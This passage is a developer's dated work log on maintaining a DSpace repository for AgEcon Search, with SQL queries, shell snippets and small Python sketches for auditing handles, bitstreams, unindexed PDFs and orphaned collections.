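    """Return True if the given rules let the agent fetch the path."""
    parser = RobotFileParser()
    parser.parse(robots_text.splitlines())
    return parser.can_fetch(agent, path)


if __name__ == "__main__":
    for path in ("/browse-title", "/browse-subject", "/browse-author"):
        print(path, allowed(PLANNED_ROBOTS, path))
```

With these rules /browse-title is allowed, while /browse-subject and /browse-author stay blocked.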

April 26, 2011

sql to pull relation metadata

select text_value from metadatavalue, handle, item where metadata_field_id=40 AND metadatavalue.item_id=handle.resource_id AND handle.resource_type_id=2 AND handle.resource_id=item.item_id AND item.withdrawn='f';

April 16, 2011

Pulling handles and bitstreams from dspace & Handles with no bitstreams

I used the SQL below to pull the bitstream data

[silvi003@strip3 ~]$ cat asset_dump.sql
 select handle.handle, bitstream.name,  bitstream.sequence_id , bitstream.internal_id 
    from handle,item2bundle,bitstream,bundle2bitstream, item where
    handle.resource_id = item2bundle.item_id AND  handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND
    bundle2bitstream.bitstream_id = bitstream.bitstream_id AND bitstream.deleted='f'  AND handle.resource_id=item.item_id AND 
    item.withdrawn='f' order by handle::text::integer;

I then filtered the license.txt bitstreams with:

psql -U dspace_sr dspace_sr < asset_dump.sql | grep -v license.txt > bitstreams.dump

To pull the handles of all live items

select handle from handle, item where handle.resource_type_id=2 AND handle.resource_id=item.item_id AND item.withdrawn='f'  order by 
handle::text::integer;

Some items do not have assets

I found that 24 of the 44257 handles have no asset associated with them. These handles are:
7816
7841
9351
9370
9682
9823
9920
10059
10353
19505
20042
21179
21327
21471
25360
25800
28566
44158
44165
44795
44822
48905
51903
61520

If you look in AgEcon:

http://ageconsearch.umn.edu/handle/61520

You find the message:

Files in This Item:

There are no files associated with this item.
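One way to find such handles is to subtract the handles that appear in the bitstream dump from the list of live handles. The sketch below shows that set difference in Python. The two handles without assets come from the list above; the third handle's file name is invented, and how the two dumps are parsed into Python values is left out.

```python
def handles_without_assets(live_handles, bitstream_rows):
    """Return the live handles that never appear in the bitstream rows."""
    with_assets = {handle for handle, _name in bitstream_rows}
    return sorted(set(live_handles) - with_assets)


if __name__ == "__main__":
    # 7816 and 61520 are from the list above; the file name is a placeholder.
    live = [7816, 61520, 62242]
    rows = [(62242, "example.xlsx")]
    print(handles_without_assets(live, rows))
```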

February 9, 2011

Modify DSPACE to accept external text files instead of using DSPACE's internal OCR system.

Introduction

To achieve this I had to modify the processBitstream method in MediaFilter.java. This allows the input of an external text file instead of using the native DSPACE OCR system. It has the "ABBYY" appendage because we plan on using the ABBYY OCR system.

Classes modified

./src/org/dspace/app/mediafilter/MediaFilter.java
./src/org/dspace/app/mediafilter/MediaFilterManager.java

Method written

processBitstream_ABBYY (in MediaFilter.java)

Bitstreams before executing code

dspace_ir_silvi003_2011_02=# SELECT bitstream.* FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle=56424;

 bitstream_id | bitstream_format_id |         name         | size_bytes |             checksum             | checksum_algorithm | description | user_format_description |                           source                            |               internal_id               | deleted | store_number | sequence_id 
--------------+---------------------+----------------------+------------+----------------------------------+--------------------+-------------+-------------------------+-------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
            3 |                   3 | Brief_2003-98677.pdf |     626917 | 9d159b478e66b012bada96b9c3df77f2 | MD5                |             |                         | /home/silvi003/dspace/dspace-ir/upload/Brief_2003-98677.pdf | 84690010223348412237368928451773250266  | f       |            0 |           1
            4 |                   2 | license.txt          |       1355 | 1d8ffcef0e2c0982456aa8c8a736e26d | MD5                |             |                         | Written by org.dspace.content.Item                          | 121016793780646677673477451716426805228 | f       |            0 |           2
(2 rows)

Bitstreams after executing code

dspace_ir_silvi003_2011_02=# SELECT bitstream.* FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle=56424;
 bitstream_id | bitstream_format_id |           name           | size_bytes |             checksum             | checksum_algorithm |  description   | user_format_description |                           source                            |               internal_id               | deleted | store_number | sequence_id 
--------------+---------------------+--------------------------+------------+----------------------------------+--------------------+----------------+-------------------------+-------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
            3 |                   3 | Brief_2003-98677.pdf     |     626917 | 9d159b478e66b012bada96b9c3df77f2 | MD5                |                |                         | /home/silvi003/dspace/dspace-ir/upload/Brief_2003-98677.pdf | 84690010223348412237368928451773250266  | f       |            0 |           1
            4 |                   2 | license.txt              |       1355 | 1d8ffcef0e2c0982456aa8c8a736e26d | MD5                |                |                         | Written by org.dspace.content.Item                          | 121016793780646677673477451716426805228 | f       |            0 |           2
            5 |                   5 | Brief_2003-98677.pdf.txt |     441997 | 2a395efbb6798effbd31b78cc410c554 | MD5                | Extracted text |                         | Written by MediaFilter org.dspace.app.mediafilter.PDFFilter | 117268227247096420229650348692064973457 | f       |            0 |           3
(3 rows)

January 27, 2011

Indexer problem and old libraries

When the full text indexer tries to process a single handle, it gives a class not found exception.

The plan

1) Locate a handle with an asset of less than a Meg in size that has not been indexed. Confirm this by directly checking the postgres DB.

2) Find the files in the library that have changed between now and Wed, 18 Feb 2009 (files pulled from the last commit to the odin system).

3) Run the indexer with current library files ... expect failure.

4) Replace the library files with the old values and run the indexer ... anticipate success.


Results:

1) Handle that has not been indexed

Handle 608 has not been indexed.

Handle | Name | Bytes
608 | 200615.pdf | 842375


If this had been indexed the query below should yield a *.pdf.txt file.


select handle.handle, bitstream.name, bitstream.size_bytes from
handle,item2bundle,bitstream,bundle2bitstream where handle.resource_id = item2bundle.item_id and
handle.resource_type_id=2 and item2bundle.bundle_id=bundle2bitstream.bundle_id and
bundle2bitstream.bitstream_id = bitstream.bitstream_id and handle = 608;

However we get


 handle |    name    | size_bytes
--------+------------+------------
 608    | 200615.pdf |     842375
(1 row)


2) Comparison of old and new libraries.



ulwal-320-bu-m:~ silvi003$ dirdiff lib_old lib_new
No matching file: lib_old/PDFBox.jar
No matching file: lib_new/commons-collections-3.2.1.jar
No matching file: lib_new/jcaptcha-1.0-all.jar
No matching file: lib_new/jxl.jar
No matching file: lib_new/pdfbox-1.1.0.jar

3) Run the indexer with current library files ... expect failure.

First make a dspace-ir test space.
[silvi003@strip1 dspace]$ tu cp -R dspace-ir dspace-ir_test

It did fail:
[silvi003@strip1 bin]$ tu ./filter-media -i  608
Applying Media Filters
:/dspace/dspace-ir_test/lib/activation.jar:/dspace/dspace-ir_test/lib/commons-cli.jar:/dspace/dspace-ir_test/lib/commons-codec-1.3.jar:/dspace/dspace-ir_test/lib/commons-collections-3.2.1.jar:/dspace/dspace-ir_test/lib/commons-collections.jar:/dspace/dspace-ir_test/lib/commons-dbcp.jar:/dspace/dspace-ir_test/lib/commons-fileupload.jar:/dspace/dspace-ir_test/lib/commons-io.jar:/dspace/dspace-ir_test/lib/commons-lang-2.1.jar:/dspace/dspace-ir_test/lib/commons-pool.jar:/dspace/dspace-ir_test/lib/fontbox.jar:/dspace/dspace-ir_test/lib/handle.jar:/dspace/dspace-ir_test/lib/jakarta-poi.jar:/dspace/dspace-ir_test/lib/jargon.jar:/dspace/dspace-ir_test/lib/jaxen.jar:/dspace/dspace-ir_test/lib/jcaptcha-1.0-all.jar:/dspace/dspace-ir_test/lib/jdom.jar:/dspace/dspace-ir_test/lib/jena.jar:/dspace/dspace-ir_test/lib/jstl.jar:/dspace/dspace-ir_test/lib/jxl.jar:/dspace/dspace-ir_test/lib/log4j.jar:/dspace/dspace-ir_test/lib/lucene.jar:/dspace/dspace-ir_test/lib/lucene-sandbox.jar:/dspace/dspace-ir_test/lib/mail.jar:/dspace/dspace-ir_test/lib/mets.jar:/dspace/dspace-ir_test/lib/oaicat.jar:/dspace/dspace-ir_test/lib/oro.jar:/dspace/dspace-ir_test/lib/pdfbox-1.1.0.jar:/dspace/dspace-ir_test/lib/pg74.216.jdbc3.jar:/dspace/dspace-ir_test/lib/rome.jar:/dspace/dspace-ir_test/lib/serializer.jar:/dspace/dspace-ir_test/lib/servlet.jar:/dspace/dspace-ir_test/lib/standard.jar:/dspace/dspace-ir_test/lib/tm-extractors.jar:/dspace/dspace-ir_test/lib/xalan.jar:/dspace/dspace-ir_test/lib/xercesImpl.jar:/dspace/dspace-ir_test/lib/xml-apis.jar:/dspace/dspace-ir_test/config:/dspace/src/dspace-ir/build/classes/
########################################### 
Collection handle: 608
*********************************************
Handle 608
Bitstream ID 2287
Filter org.dspace.app.mediafilter.PDFFilter
Bitstream supports filter true
Bitstream name 200615.pdf.txt
Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/commons/logging/LogFactory
	at org.apache.pdfbox.util.PDFStreamEngine.(PDFStreamEngine.java:63)
	at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:102)
	at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:159)
	at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:357)
	at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:311)
	at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:272)
	at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:211)
[silvi003@strip1 bin]$ 

4) Replace the library files with the old values and run the indexer ... anticipate success.

This also fails, but on a different missing class:
[silvi003@strip1 bin]$ tu ./filter-media -i  608
Applying Media Filters
:/dspace/dspace-ir_test/lib/activation.jar:/dspace/dspace-ir_test/lib/commons-cli.jar:/dspace/dspace-ir_test/lib/commons-codec-1.3.jar:/dspace/dspace-ir_test/lib/commons-collections.jar:/dspace/dspace-ir_test/lib/commons-dbcp.jar:/dspace/dspace-ir_test/lib/commons-fileupload.jar:/dspace/dspace-ir_test/lib/commons-io.jar:/dspace/dspace-ir_test/lib/commons-lang-2.1.jar:/dspace/dspace-ir_test/lib/commons-pool.jar:/dspace/dspace-ir_test/lib/fontbox.jar:/dspace/dspace-ir_test/lib/handle.jar:/dspace/dspace-ir_test/lib/jakarta-poi.jar:/dspace/dspace-ir_test/lib/jargon.jar:/dspace/dspace-ir_test/lib/jaxen.jar:/dspace/dspace-ir_test/lib/jdom.jar:/dspace/dspace-ir_test/lib/jena.jar:/dspace/dspace-ir_test/lib/jstl.jar:/dspace/dspace-ir_test/lib/log4j.jar:/dspace/dspace-ir_test/lib/lucene.jar:/dspace/dspace-ir_test/lib/lucene-sandbox.jar:/dspace/dspace-ir_test/lib/mail.jar:/dspace/dspace-ir_test/lib/mets.jar:/dspace/dspace-ir_test/lib/oaicat.jar:/dspace/dspace-ir_test/lib/oro.jar:/dspace/dspace-ir_test/lib/PDFBox.jar:/dspace/dspace-ir_test/lib/pg74.216.jdbc3.jar:/dspace/dspace-ir_test/lib/rome.jar:/dspace/dspace-ir_test/lib/serializer.jar:/dspace/dspace-ir_test/lib/servlet.jar:/dspace/dspace-ir_test/lib/standard.jar:/dspace/dspace-ir_test/lib/tm-extractors.jar:/dspace/dspace-ir_test/lib/xalan.jar:/dspace/dspace-ir_test/lib/xercesImpl.jar:/dspace/dspace-ir_test/lib/xml-apis.jar:/dspace/dspace-ir_test/config:/dspace/src/dspace-ir/build/classes/
########################################### 
Collection handle: 608
*********************************************
Handle 608
Bitstream ID 2287
Filter org.dspace.app.mediafilter.PDFFilter
Bitstream supports filter true
Bitstream name 200615.pdf.txt
Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/pdfbox/util/PDFTextStripper
	at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:102)
	at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:159)
	at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:357)
	at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:311)
	at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:272)
	at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:211)


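However, the PDFTextStripper class is there. Note that in the old jar it sits under org/pdfbox/util, not under the org/apache/pdfbox/util path named in the exception.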


[silvi003@strip1 lib]$ jar -tvf PDFBox.jar | grep PDFTextStripper
13194 Thu Oct 12 12:19:36 CDT 2006 org/pdfbox/util/PDFTextStripper.class
3358 Thu Oct 12 12:19:38 CDT 2006 org/pdfbox/util/PDFTextStripperByArea.class
4382 Mon Jul 31 20:27:52 CDT 2006 Resources/PDFTextStripper.properties
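
Both failures come down to a class that the classpath cannot supply under the package name being requested. In the first run the missing class is org/apache/commons/logging/LogFactory, which normally ships in a commons-logging jar, and no such jar appears in the classpath printed above. A quick way to see which jar (if any) holds a class, and under which package, is to scan every jar in the lib directory. The sketch below does this in Python. The function names are hypothetical, and the demo jars are empty fakes whose entries only mirror the two package paths seen in this entry.

```python
import os
import tempfile
import zipfile

def jars_containing(lib_dir, class_name):
    """Map jar file name -> entries whose simple class name equals class_name."""
    suffix = "/" + class_name + ".class"
    hits = {}
    for name in sorted(os.listdir(lib_dir)):
        if not name.endswith(".jar"):
            continue
        # A jar is a zip archive, so the zipfile module can list its entries.
        with zipfile.ZipFile(os.path.join(lib_dir, name)) as jar:
            matches = [entry for entry in jar.namelist() if entry.endswith(suffix)]
        if matches:
            hits[name] = matches
    return hits

def build_demo_lib():
    """Create a throwaway lib directory with two fake jars (invented, empty classes)."""
    lib_dir = tempfile.mkdtemp()
    fake = {
        "PDFBox.jar": ["org/pdfbox/util/PDFTextStripper.class"],
        "pdfbox-1.1.0.jar": ["org/apache/pdfbox/util/PDFTextStripper.class"],
    }
    for jar_name, entries in fake.items():
        with zipfile.ZipFile(os.path.join(lib_dir, jar_name), "w") as jar:
            for entry in entries:
                jar.writestr(entry, b"")
    return lib_dir

if __name__ == "__main__":
    for jar_name, entries in jars_containing(build_demo_lib(), "PDFTextStripper").items():
        print(jar_name, entries)
```

Pointed at a real lib directory, an empty result for LogFactory would confirm that the jar is missing rather than misnamed. Classes in the default package (no directory prefix) are not matched by this sketch.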

January 14, 2011

Big SQL query to find handles where the pdf has not been indexed in DSPACE

The UDC DSPACE instance has a full text indexer. However, there are many pdfs that have not been indexed. I wrote a SQL query to find these:
SELECT handle.handle, bitstream.name, bitstream.size_bytes  FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle in 
((SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.name ~ '^.*pdf$')  EXCEPT (SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.name ~ '^.*pdf.txt$')) order by handle::text::integer;

This produces output like:

 handle |                                                               name                                                                | size_bytes 
--------+-----------------------------------------------------------------------------------------------------------------------------------+------------
 394    | Connect2006Fall.pdf                                                                                                               |    2146701
 394    | license.txt                                                                                                                       |       1400
 406    | m139.pdf                                                                                                                          |    1349983
 406    | license.txt                                                                                                                       |       1371
 406    | m139_Extras.zip                                                                                                                   |    2240787
 406    | m139meta.doc.txt                                                                                                                  |       2342
 406    | index.txt.txt                                                                                                                     |       1850
 422    | license.txt                                                                                                                       |       1371


Breaking down the above expression:
SELECT handle.handle, bitstream.name, bitstream.size_bytes FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND handle in {THE HANDLES OF NON INDEXED PDF}
Next Step:
THE HANDLES OF NON INDEXED PDF = SELECT {HANDLES THAT HAVE A PDF} EXCEPT {HANDLES THAT ARE INDEXED}

HANDLES THAT HAVE A PDF = SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND bitstream.name ~ '^.*pdf$';

HANDLES THAT ARE INDEXED = SELECT handle.handle FROM handle,item2bundle,bitstream,bundle2bitstream WHERE handle.resource_id = item2bundle.item_id AND handle.resource_type_id=2 AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id = bitstream.bitstream_id AND bitstream.name ~ '^.*pdf.txt$';
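
The core of the query is a set difference: handles with a pdf, EXCEPT handles with a pdf.txt. The sketch below replays that inner part on a few invented rows, using Python with an in-memory SQLite database in place of postgres. Two things are assumptions of the sketch and not part of the original query: the tables hold only the columns needed for the join, and LIKE stands in for the postgres `~` operator because SQLite has no built-in regex match (LIKE is also case-insensitive for ASCII, unlike `~`).

```python
import sqlite3

# The four-table join shared by both halves of the EXCEPT.
JOIN = """
    FROM handle, item2bundle, bitstream, bundle2bitstream
    WHERE handle.resource_id = item2bundle.item_id
      AND handle.resource_type_id = 2
      AND item2bundle.bundle_id = bundle2bitstream.bundle_id
      AND bundle2bitstream.bitstream_id = bitstream.bitstream_id
"""

def unindexed_pdf_handles(conn):
    """Handles that have a *pdf bitstream but no *pdf.txt bitstream."""
    sql = (
        "SELECT handle.handle" + JOIN + " AND bitstream.name LIKE '%pdf'"
        " EXCEPT "
        "SELECT handle.handle" + JOIN + " AND bitstream.name LIKE '%pdf.txt'"
    )
    # Sort numerically in Python, mirroring ORDER BY handle::text::integer.
    return sorted((row[0] for row in conn.execute(sql)), key=int)

def demo_connection():
    """Invented rows: one unindexed pdf, one indexed pdf, one item with only a license."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE handle (handle TEXT, resource_type_id INTEGER, resource_id INTEGER);
        CREATE TABLE item2bundle (item_id INTEGER, bundle_id INTEGER);
        CREATE TABLE bundle2bitstream (bundle_id INTEGER, bitstream_id INTEGER);
        CREATE TABLE bitstream (bitstream_id INTEGER, name TEXT);
        INSERT INTO handle VALUES ('608', 2, 1), ('56424', 2, 2), ('700', 2, 3);
        INSERT INTO item2bundle VALUES (1, 10), (2, 20), (2, 21), (3, 30);
        INSERT INTO bundle2bitstream VALUES (10, 100), (20, 200), (21, 201), (30, 300);
        INSERT INTO bitstream VALUES
            (100, '200615.pdf'),
            (200, 'Brief_2003-98677.pdf'),
            (201, 'Brief_2003-98677.pdf.txt'),
            (300, 'license.txt');
    """)
    return conn

if __name__ == "__main__":
    print(unindexed_pdf_handles(demo_connection()))
```

Only the handle whose pdf has no matching extracted-text bitstream survives the EXCEPT. The outer SELECT in the full query then lists every bitstream of those handles, which is why license.txt rows appear in its output.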

December 20, 2010

AgEcon handle 93411 messed up ... reingest

The handle 93411 had no uri metadata and Louise could not open it in an agecon browser window. Here is a message that I sent to Louise

Louise, I have spent some time on this problem. It turns out that 93411 has no uri entry. I fixed this, but the item would not appear in DSPACE. I then found that it was not in any collection. I also fixed this but was again unable to display the item. Something is deeply sick with this item. I have extracted all the meta data and the pdf. I suggest that you reingest it into DSPACE. When you are done I will delete the 93411.

Jeff


Here are the files that I sent her.

The metadata fields for 93411 in an excel file

A pdf of the asset for 93411

Some SQL along the way:

Find the item_id

select distinct metadatavalue.item_id from handle, metadatavalue where metadatavalue.item_id=handle.resource_id AND handle=93411;

The value for this is: 46277




Insert a uri and a community:

INSERT INTO metadatavalue (item_id , metadata_field_id , text_value , text_lang , place) VALUES (46277,25,'http://purl.umn.edu/93411',' ', 1);

INSERT INTO communities2item (community_id , item_id) VALUES (312,46277);

These failed to make 93411 visible.

Find the bitstream.

select bitstream.bitstream_id from handle,item2bundle,bundle2bitstream,bitstream where handle.resource_id=item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND bundle2bitstream.bitstream_id=bitstream.bitstream_id AND handle= 93411;

Here is a weird bitstream that I found. The pdf above is a rename of this weird bitstream.


bitstream_id | bitstream_format_id | name | size_bytes | checksum | checksum_algorithm | description | user_format_description | source | internal_id | deleted | store_number | sequence_id
--------------+---------------------+----------------+------------+----------------------------------+--------------------+-------------+-------------------------+--------------------------------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
62283 | 3 | aar11.12-g.pdf | 350991 | a8f946880c52a2ca33ebd8a3992bfdc3 | MD5 | | | /dspace/assetstore/dspace-sr/upload/d:\我的文档\上传文件\十一十二上传\aar11.12-g.pdf | 102022284912009077416587006709868722823 | f | 0 | 2

December 8, 2010

SQL to find handles that correspond to a specific language.iso in DSPACE

select handle,metadatavalue.text_value from handle, item, metadatavalue where metadatavalue.item_id=handle.resource_id AND metadata_field_id = 38 AND handle.resource_type_id=2 AND text_value='French' AND handle.resource_id=item.item_id AND item.withdrawn='f';

November 24, 2010

Documentation of php code to query DSPACE DB

Code | Purpose | Documentation complete
-----+---------+-----------------------
port_meta_field_uniq_count.php | Get a count of the unique values for a field (metadata_id) | yes
port_file_handles_to_meta.php | Take a file of DSPACE handles and dump the associated metadata to an excel file | yes
port_DSPACE_sql.inc.php | Set of utility functions | no
port_metadata_id_to_full_table.php | Finds all the metadata associated with non null values of a metadata id. E.g. dc.subject.mesh has a metadata_id of 62, so ./port_metadata_id_to_full_table.php 62 will make an excel spreadsheet of all the metadata where dc.subject.mesh is not null | yes
port_metadata_count.php | Gives a count of occurrences of a metadata text field | yes
port_sql_column_diff.php | Does a diff between two SQL columns | no

November 18, 2010

DSPACE sql for items that have not been withdrawn

The line below will do a search for dc.type (metadata_field_id=66) for items that have not been withdrawn.
select handle from handle, metadatavalue, item where metadata_field_id=66 AND metadatavalue.item_id=handle.resource_id AND text_value='Other' AND resource_id=item.item_id AND withdrawn='f';

mime types in AgEcon

Overview

I have found that the metadata field dc.format.mimetype (metadata_field_id = 36) only contains entries for items from before the migration to DSPACE. In general, we will need to use the Format field from the bitstream table, which is valid for items from both before and after the migration.

dc.format.mimetype

The little shell script below pulls the handles of items that have non-null values for dc.format.mimetype.
query="select handle from metadatavalue,handle where metadata_field_id=36 AND item_id=handle.resource_id AND handle.resource_type_id=2;"
echo "$query" > temp_sql_file
psql -U dspace_sr  dspace_sr  < temp_sql_file
rm temp_sql_file
This shell script pulls all item handles.
query="select  handle  from handle where handle.resource_type_id=2;"
echo "$query" > temp_sql_file
psql -U dspace_sr  dspace_sr  < temp_sql_file
rm temp_sql_file
With these two scripts, I was able to find the handles that did and did not have the dc.format.mimetype field populated.
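
The comparison of the two outputs can be done with plain set operations once the handles are pulled out of the psql text. The sketch below is one way to do that in Python. It assumes psql's default table layout (header, dashed rule, one handle per line, row-count footer), and the function names and sample outputs are made up for illustration.

```python
def parse_handles(psql_output):
    """Collect the integer handles from psql's default table output."""
    handles = set()
    for line in psql_output.splitlines():
        token = line.strip()
        # Header, dashed rule and "(N rows)" footer are not purely numeric.
        if token.isdecimal():
            handles.add(int(token))
    return handles

def split_by_mimetype(all_output, with_mimetype_output):
    """Return (handles with dc.format.mimetype, handles without it), both sorted."""
    all_handles = parse_handles(all_output)
    populated = parse_handles(with_mimetype_output) & all_handles
    return sorted(populated), sorted(all_handles - populated)

# Invented sample outputs in the shape psql prints by default.
ALL_ITEMS = """ handle 
--------
 36676
 96677
(2 rows)
"""

WITH_MIMETYPE = """ handle 
--------
 36676
(1 row)
"""

if __name__ == "__main__":
    populated, missing = split_by_mimetype(ALL_ITEMS, WITH_MIMETYPE)
    print("populated:", populated)
    print("missing:", missing)
```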

Comparison of metadata pre and post migration to DSPACE

Here is a comparison of pre vs post migration to DSPACE and the metadata fields related to mimetype.
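DSPACE Table Element              | Present Pre-Migration (example handle 36676) | Present Post-Migration (example handle 96677)
----------------------------------+----------------------------------------------+-----------------------------------------------
dc.format.mimetype                | yes                                          | no
Bitstream.name                    | yes                                          | yes
Bitstream.source                  | no                                           | yes
Bitstream.description             | no                                           | yes
Bitstream.format                  | yes                                          | yes
Bitstream.user format description | no                                           | no
Bitstream.license                 | no                                           | yes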
The information for the table above came largely from the bitstream table.

Bitstream table for handle 96677:
Bitstream table for handle 36676: Old_bitstream_ 36676.tiff

Summary of Bitstream.format

I have found the unique mime types in AgEcon using the bitstream.format field:
application/pdf 45264
application/octet-stream 1
application/vnd.ms-excel 2
The handles for the non-pdf files are:
application/octet-stream
62242
application/vnd.ms-excel
42187
92231
This field will be used to determine mime type.

November 8, 2010

mismatch between handle table and collection/community tables

Problem: some collection and community handles are in the handle table but are not found in the collection/community tables

1) If you put one of these handles (for example 59677) into the AgEcon system you get:
Invalid Identifier

The identifier /59677 does not correspond to a valid Object in AgEcon Search. This may be because of one of the following reasons:

    * The URL of the current page is incorrect - if you followed a link from outside of AgEcon Search it may be mistyped or corrupt.
    * You entered an invalid ID into a form - please try again.

If you're having problems, or you expected the ID to work, feel free to contact the site administrators.
2) The handles do exist in the purl system. I call collections of this type "zombie" collections/communities.
3) Before we migrate to Islandora, we need to find all the zombie collections/communities and make sure that they are not transferred into the new system and that they are tombstoned in the purl system.

Locating all the troublesome handles

I wrote some small php code that found a vector of handles for items, collections or communities from the handle table and then diffed this vector with one from the item, collection or community table. Below are the results.

Items

query1 SELECT handle FROM handle, item  WHERE handle.resource_type_id=2 AND handle.resource_id=item.item_id
query2 SELECT handle FROM handle WHERE resource_type_id=2
Length query 1 item_id 42838
Length query 2 42838
Length diff array 0

Collections

Array
(
    [39] => 33702
    [47] => 33718
    [48] => 33720
    [50] => 33724
    [51] => 33726
    [63] => 33750
    [70] => 33764
    [71] => 33766
    [72] => 33768
    [81] => 33786
    [82] => 33788
    [101] => 33826
    [111] => 33846
    [126] => 33876
    [127] => 33878
    [128] => 33880
    [149] => 33922
    [158] => 33940
    [159] => 33942
    [171] => 33966
    [183] => 33990
    [187] => 33998
    [192] => 34008
    [201] => 34026
    [202] => 34028
    [234] => 34092
    [237] => 34098
    [302] => 34228
    [312] => 34248
    [319] => 34262
    [322] => 34268
    [325] => 34274
    [328] => 34280
    [329] => 34282
    [330] => 34284
    [331] => 34286
    [332] => 34288
    [333] => 34289
    [334] => 34290
    [335] => 34291
    [336] => 34293
    [337] => 34295
    [338] => 34297
    [339] => 34299
    [340] => 34301
    [341] => 34303
    [342] => 34305
    [343] => 34307
    [344] => 34309
    [345] => 34311
    [346] => 34313
    [347] => 34315
    [348] => 34317
    [349] => 34319
    [350] => 34321
    [351] => 34323
    [359] => 34340
    [360] => 34342
    [362] => 34344
    [363] => 34346
    [364] => 34348
    [365] => 34350
    [368] => 34356
    [699] => 35008
    [718] => 35046
    [851] => 35312
    [868] => 35346
    [1123] => 35857
    [1322] => 36453
    [1323] => 36456
    [1324] => 36459
    [1325] => 36462
    [1333] => 36486
    [1361] => 36570
    [1365] => 36582
    [1371] => 36600
    [1373] => 36606
    [1383] => 36636
    [1405] => 36998
    [1435] => 37168
    [1436] => 37170
    [1451] => 37295
    [1459] => 37584
    [1460] => 37586
    [1483] => 37939
    [1484] => 37940
    [1485] => 37942
    [1486] => 37947
    [1490] => 37968
    [1502] => 42438
    [1519] => 42893
    [1560] => 43992
    [1562] => 44080
    [1584] => 44940
    [1602] => 45639
    [1621] => 46044
    [1623] => 46046
    [1638] => 46277
    [1643] => 46321
    [1645] => 46501
    [1646] => 46502
    [1685] => 47047
    [1753] => 47495
    [1766] => 47829
    [1771] => 48118
    [1784] => 48250
    [1812] => 49828
    [1814] => 49831
    [1822] => 50343
    [1836] => 51324
    [1845] => 52117
    [1849] => 52237
    [1860] => 53120
    [1865] => 53221
    [1867] => 53245
    [1868] => 53287
    [1877] => 53371
    [1887] => 53406
    [1921] => 53652
    [1953] => 54541
    [1973] => 55664
    [2070] => 56401
    [2139] => 58795
    [2140] => 58798
    [2216] => 59649
    [2239] => 59672
    [2241] => 59676
    [2242] => 59677
    [2305] => 91208
    [2411] => 94371
)
query1 SELECT handle FROM handle, collection  WHERE handle.resource_type_id=3 AND handle.resource_id=collection.collection_id
query2 SELECT handle FROM handle WHERE resource_type_id=3
Length query 1 item_id 2295
Length query 2 2425
Length diff array 130
[silvi003@strip1 bin]$ 

Communities


Array
(
    [5] => 35871
    [11] => 35889
    [12] => 35892
    [14] => 35900
    [15] => 35903
    [16] => 35906
    [17] => 35909
    [258] => 36632
    [259] => 36635
    [285] => 37192
    [301] => 37938
    [302] => 37941
    [315] => 42934
    [327] => 43991
    [349] => 47494
    [369] => 53119
    [375] => 53468
    [382] => 56201
    [394] => 60659
    [407] => 93689
)
query1 SELECT handle FROM handle, community  WHERE handle.resource_type_id=4 AND handle.resource_id=community.community_id
query2 SELECT handle FROM handle WHERE resource_type_id=4
Length query 1 item_id 397
Length query 2 417
Length diff array 20
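
The bracketed numbers in the arrays above are positions in the handle-table result, not counts. That is what a key-preserving diff produces (PHP's array_diff behaves this way). The sketch below shows the same comparison in Python. It is not the original php code: the function name is hypothetical and the sample handles are invented.

```python
def zombie_handles(handle_table, joined_table):
    """Return {position: handle} for handles present in handle_table only.

    handle_table: handles from "SELECT handle FROM handle WHERE resource_type_id=..."
    joined_table: handles that also join to the collection/community table
    """
    present = set(joined_table)
    return {
        position: handle
        for position, handle in enumerate(handle_table)
        if handle not in present
    }

if __name__ == "__main__":
    from_handle_table = [33700, 33702, 33704]
    from_join = [33700, 33704]
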